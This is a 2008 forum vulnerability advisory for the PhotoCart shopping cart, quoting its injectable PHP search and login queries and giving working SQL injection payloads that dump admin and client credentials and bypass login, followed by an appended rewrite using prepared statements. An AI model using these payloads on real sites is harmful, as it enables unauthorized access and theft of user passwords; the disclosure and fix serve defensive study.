PhotoCart <= 3.9 SQL Injection Vulnerability

Discussion in 'Vulnerabilities' started by ~!DoK_tOR!~, 18 Aug 2008.

    Author: ~!Dok_tOR!~
    Date found: 18.08.08
    Product: PhotoCart
    Version: 3.9, possibly earlier versions as well
    Type: Photography Shopping Cart
    URL: www.picturespro.com
    Vulnerability Class: SQL Injection

    /[installdir]/search.php

    Vuln code:

    PHP:
    if($_REQUEST['searchby'] == "qtitle") {
        // $_REQUEST['qtitle'] is concatenated into the SQL string without escaping
        $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire  AND gal_title LIKE  '%".$_REQUEST['qtitle']."%'  ";
        print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
    }
    if($_REQUEST['searchby'] == "qid") {
        // same pattern for $_REQUEST['qid']
        $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire  AND gal_id='".$_REQUEST['qid']."'  ";
        print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
    }
    if($_REQUEST['searchby'] == "qdate") {
        // the three date parts are joined unchecked and then interpolated into the query
        $gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
        $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire  AND gal_date='$gdate'   ";
        print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
    }

    Precondition: magic_quotes_gpc = Off

    Example:
    http://[server]/[installdir]/search.php

    Enter the following in the Gallery or event name field:

    Exploit 1:

    Code:
    ' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin/*

    Exploit 2:

    Code:
    ' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,client_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from pc_clients/*

    Authentication Bypass SQL Injection

    /[installdir]/_login.php

    Vuln code:

    PHP:
    $result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");

    Email Address: 1' or 1=1/*
    Password: 1' or 1=1/*

    http://milw0rm.com/exploits/6285
     
    #1 ~!DoK_tOR!~, 18 Aug 2008
    Last edited: 22 Aug 2008
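The fixed form of the two queries from the post, as an added example that is not PhotoCart's own code and not part of the original thread. It assumes a PDO connection to the PhotoCart database; the table and column names used (pc_clients, client_email, client_pass, gal_status, gal_client, gal_title, gal_id, gal_date) are the ones visible in the post, the galleries table name `pc_gallery` in the usage comment is an assumption, `$andExpire` stands in for the page's pre-built `$and_expire` fragment and is assumed to be constant SQL, and `client_pass` is assumed to hold a `password_hash()` value rather than the plaintext the union query dumps.

```php
<?php
// Added example: parameterised rewrite of the search.php and _login.php queries
// described in the advisory. Not the project's code; names marked below are assumed.
declare(strict_types=1);

/**
 * Build the WHERE clause for search.php without interpolating request data.
 * Returns [sql, params] for use with a prepared statement.
 * $andExpire is the page's pre-built fragment, assumed to contain no user input.
 */
function buildGalleryWhere(array $req, string $andExpire = ''): array
{
    $sql    = "WHERE gal_status = '1' AND gal_client != '1' $andExpire";
    $params = [];

    // Whitelist the search mode instead of branching on raw $_REQUEST['searchby'].
    switch ($req['searchby'] ?? '') {
        case 'qtitle':
            $sql .= ' AND gal_title LIKE ?';
            // Escape LIKE metacharacters so % and _ in the input do not widen the match.
            $needle   = addcslashes((string)($req['qtitle'] ?? ''), '%_\\');
            $params[] = "%{$needle}%";
            break;

        case 'qid':
            // Gallery ids are numeric; reject anything else before it reaches SQL.
            if (!ctype_digit((string)($req['qid'] ?? ''))) {
                throw new InvalidArgumentException('qid must be a positive integer');
            }
            $sql .= ' AND gal_id = ?';
            $params[] = (int)$req['qid'];
            break;

        case 'qdate':
            $y = (int)($req['qyear'] ?? 0);
            $m = (int)($req['qmonth'] ?? 0);
            $d = (int)($req['qday'] ?? 0);
            if (!checkdate($m, $d, $y)) {
                throw new InvalidArgumentException('invalid gallery date');
            }
            $sql .= ' AND gal_date = ?';
            $params[] = sprintf('%04d-%02d-%02d', $y, $m, $d);
            break;

        default:
            throw new InvalidArgumentException('unknown searchby value');
    }
    return [$sql, $params];
}

/**
 * Replacement for the _login.php query: bind the e-mail, then check the password
 * with password_verify() instead of matching it inside the SQL statement.
 * Assumes client_pass stores a password_hash() value (migration is a separate step).
 */
function authenticateClient(PDO $db, string $email, string $password): ?array
{
    $stmt = $db->prepare('SELECT * FROM pc_clients WHERE client_email = ? LIMIT 1');
    $stmt->execute([$email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, (string)$row['client_pass'])) {
        return null; // same result for unknown e-mail and wrong password
    }
    return $row;
}

// Usage (DSN and credentials are placeholders; pc_gallery is an assumed table name):
// $db = new PDO('mysql:host=localhost;dbname=photocart;charset=utf8mb4', 'user', 'pass', [
//     PDO::ATTR_EMULATE_PREPARES => false,
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
// ]);
// [$where, $params] = buildGalleryWhere($_REQUEST, $and_expire);
// $stmt = $db->prepare("SELECT * FROM pc_gallery $where");
// $stmt->execute($params);
//
// $client = authenticateClient($db, $_POST['email'] ?? '', $_POST['password'] ?? '');
```

With the values bound as parameters, the `' union select ...` and `1' or 1=1/*` inputs from the post are treated as literal strings: the search returns no matching title and the login returns `null`. Disabling `PDO::ATTR_EMULATE_PREPARES` makes MySQL itself perform the binding rather than the PHP driver.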